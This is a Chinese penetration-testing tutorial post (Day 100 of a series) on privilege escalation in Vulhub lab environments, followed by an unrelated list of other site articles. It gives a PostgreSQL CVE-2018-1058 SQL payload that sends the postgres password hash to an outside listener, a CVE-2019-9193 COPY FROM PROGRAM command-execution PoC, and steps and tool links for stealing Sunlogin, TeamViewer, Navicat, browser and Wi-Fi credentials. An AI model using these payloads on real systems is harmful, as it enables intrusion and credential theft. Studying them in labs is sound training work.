第100天:权限提升-数据库RedisPostgre第三方软件TV向日葵服务类

目录

思维导图

案例一:  数据库-Redis 数据库权限提升-计划任务

案例二:  数据库-PostgreSQL 数据库权限提升-漏洞

PostgreSQL 提权漏洞(CVE-2018-1058)

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 

案例三:  三方应用-Teamviewer&向日葵&Navivat-凭据

向日葵

teamviewer

获取navicat或者一些浏览器密码


思维导图

案例一:  数据库-Redis 数据库权限提升-计划任务

redis攻防之前写过一篇文章这里不赘述
第55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE-CSDN博客

案例二:  数据库-PostgreSQL 数据库权限提升-漏洞

PostgreSQL 提权漏洞(CVE-2018-1058)

靶场地址:Vulhub - Docker-Compose file for vulnerability environment

首先部署docker

利用命令进行连接数据库

psql --host your-ip --username vulhub

输入下面的命令,进行生成后门

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

开启监听

利用超级用户执行docker命令

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

成功反弹shell

后面是管理员的MD5加密密码

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 

靶场位置:https://vulhub.org/#/environments/postgres/CVE-2019-9193/

首先拉取靶场后利用工具连接

 利用下面的poc可以进行任意命令执行

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

 如果可以执行命令,就可以权限提升

案例三:  三方应用-Teamviewer&向日葵&Navivat-凭据

向日葵

利用webshell查看进程,命令tasklist看是否有 SunloginClient.exe

利用工具cs的欧拉插件,欧拉插件的下载地址

链接:https://pan.baidu.com/s/1VlXzscen07K1tcUAxyEKyw?pwd=id41
提取码:id41

利用cs时先生成后门,反弹shell这里不再赘述,不会的去翻看前面的文章

先上传,再运行,为了确保有执行权限放在网站目录下

 

运行以后这里由于版本问题,旧版的向日葵已经无法正常运行了,而新版的做了完整的限制

这里只能看到验证码,看不到识别码,主要学习思路,万一遇到了符合的版本就ok

利用工具进行解密

工具的地址:GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具

视频中的执行效果

teamviewer

cs的欧拉插件里面也有自动提取密码的模块,iis用户貌似是无法执行的,其他得有个普通用户的权限

也可以利用这个msf进行破解,首先先生成后门建立连接,这里就不过多赘述

注意一定是在这个会话下,执行下面的命令

run post/windows/gather/credentials/teamviewer_passwords

获取navicat或者一些浏览器密码

需要用到插件LSTAR

链接:https://pan.baidu.com/s/1YGSHtdL3-IWAZUopqTkU6Q?pwd=cj10
提取码:cj10

利用工具

获取一下wifi密码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/675935.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

使用system verilog进行流水灯和VGA打印字符

使用system verilog进行流水灯和VGA打印字符 目录 **使用system verilog进行流水灯和VGA打印字符****system verilog的优点****VGA程序编写**VGA 控制器模块字符生成模块顶层模块测试基准程序**效果** **流水灯程序设计****效果** **总结** system verilog的优点 面向对象编程…

C# WinForm —— 27 28 29 30 ListView 介绍与应用

1. 简介 和ListBox的外观类似,都可以多列显示,但 ListView 功能更强大,提供了5种不同的显示方式 2. 属性 属性解释(Name)控件ID,在代码里引用的时候会用到Enabled控件是否启用CheckBoxes复选框是否显示在项旁边ContextMenuStri…

浏览器渲染优--防抖节流懒加载

合理选择css选择器 相比于.content-title-span,使用.content .title span时,浏览器计算样式所要花费的时间更多。使用后面一种规则,浏览器必须遍历页面上所有 span 元素,先过滤掉祖先元素不是.title的,再过滤掉.title…

拿笔记下来!产品采购制造类合同怎样写比较稳妥?

拿笔记下来!产品采购制造类合同怎样写比较稳妥? 近日,几经波折,泰中两国终于完成了潜艇采购谈判!你知道吗?产品制造类合同或协议在起草前如果没有充分考虑各种因素,可能会导致一系列问题和不利…

奶茶店、女装店、餐饮店是高危创业方向,原因如下:

关注卢松松,会经常给你分享一些我的经验和观点。 现在的俊男靓女们,心中都有一个执念: (1)想证明自己了,开个奶茶去…… (2)想多赚点钱了,加盟餐饮店去…… (3)工作不顺心了,搞个女装店去…… 但凡抱着…

【scau数据库实验一】mysql_navicat_数据库定义实验、基本命令

实验一开始之前,如果还有不会使用navicat建议花五分钟补课哦~ 补课地址:【scau数据库实验先导】mysql_navicat_数据库新建、navicat的使用-CSDN博客 实验目的: 理解和掌握数据库DDL语言,能够熟练地使用SQL DDL语句创建、修改和删…

mac电脑用谷歌浏览器对安卓手机H5页面进行inspect

1、mac上在谷歌浏览器上输入 chrome://inspect 并打开该页面。 2、连接安卓手机到Mac电脑:使用USB数据线将安卓手机连接到Mac电脑。 3、手机上打开要的h5页面 Webview下面选择要的页面,点击inspect,就能像谷歌浏览器页面打开下面的页面&#…

Vue——初识组件

文章目录 前言页面的构成何为组件编写组件组件嵌套注册 效果展示 前言 在官方文档中,对组件的知识点做了一个很全面的说明。本篇博客主要写一个自己的案例讲解。 vue 官方文档 组件基础 页面的构成 说到组件之前,先大致说明下vue中页面的构成要素。 在…

Claude 3可使用第三方API,实现业务流程自动化

5月31日,著名大模型平台Anthropic宣布,Claude3模型可以使用第三方API和工具。 这也就是说,用户通过文本提问的方式就能让Claude自动执行多种任务,例如,从发票中自动提取姓名、日期、金额等,该功能对于开发…

【问题随记】System policy prevents Wi-Fi scans,解决连接 WIFI 需要权限的问题

问题随记 System policy prevents Wi-Fi scans,每次打开我的开发板连接 wifi 都会出现下面的弹窗,这也阻挡了我的WIFI自动连接,然后就需要连上屏幕,输入 wifi 密码,这样才能进行 VNC、SSH 等一系列的连接。 问题解决 …

『 Linux 』缓冲区(万字)

文章目录 🦦 什么是缓冲区🦦 格式化输入/输出🦦 刷新策略🪶 块缓冲(fully buffered)🪶 无缓冲(unbuffered)🪶 行缓冲(line buffered) 🦦 现象解释🦦 exit()与_exit()🦦 进…

CPU 使用率过高问题排查

文章目录 CPU 使用率过高问题排查1. CPU使用率过高常见问题2. 压力测试2.1 stress安装参数说明测试示例 2.2 stress-ng安装参数说明测试示例 3. 问题排查3.1 使用 top 命令3.2 使用 ps 命令3.3 使用 perf top3.4 vmstat 命令常用信息内存信息磁盘信息 CPU 使用率过高问题排查 …

Plotting World Map in Python

1. 方法一 pygal Plotting World Map Using Pygal in Python import pygal # create a world map worldmap pygal.maps.world.SupranationalWorld() # set the title of map worldmap.title Continents# adding the continents worldmap.add(Africa, [(africa)]) worl…

【微信小程序】小锦哥小程序工具 v2.3.8.0

# 简介 小锦哥小程序工具是一款可以对微信小程序进行解密或者反编译的工具,通过这款工具,可以对别人已经发布的小程序进行解密或者是反编译,然后查看源代码。对于网络安全人员来说,可以使用该工具进行安全审计,发现其…

四川汇聚荣聚荣科技有限公司评价怎么样?

四川汇聚荣聚荣科技有限公司评价如何?在科技日新月异的今天,四川汇聚荣聚荣科技有限公司作为业界的一员,其表现自然引起了广泛关注。那么,这家公司究竟如何呢?接下来,我们将从四个不同方面对其进行深入剖析。 一、技术实力 四川…

3DGS语义分割之LangSplat

LangSplat是CVPR2024的paper. 实现3DGS的语义分割(可文本检索语义) github: https://github.com/minghanqin/LangSplat?tabreadme-ov-file 主要思想是在3DGS中加入了CLIP的降维语义特征,可用文本检索目标,实现分割。 配置环境&…

三十四、openlayers官网示例Dynamic clusters解析——动态的聚合图层

官网demo地址: https://openlayers.org/en/latest/examples/clusters-dynamic.html 这篇绘制了多个聚合图层。 先初始化地图 ,设置了地图视角的边界extent,限制了地图缩放的范围 initMap() {const raster new TileLayer({source: new XYZ…

导入和使用标准模块

自学python如何成为大佬(目录):https://blog.csdn.net/weixin_67859959/article/details/139049996?spm1001.2014.3001.5501 在Python中,自带了很多实用的模块,称为标准模块(也可以称为标准库),对于标准模块&#xf…

韩顺平0基础学java——第15天

p303-326 重写override 和重载做个对比 注:但子类可以扩大范围,比如父类是protected,子类可以是public 多态 方法或对象具有多种形态,是面向对象的第三大特征,多态是建立在封装和继承基础之上的。 多态的具体体现…

Ubuntu server 24 (Linux) 安装部署smartdns 搭建智能DNS服务器

SmartDNS是推荐本地运行的DNS服务器,SmartDNS接受本地客户端的DNS查询请求,从多个上游DNS服务器获取DNS查询结果,并将访问速度最快的结果返回给客户端,提高网络访问速度和准确性。 支持指定域名IP地址,达到禁止过滤的效…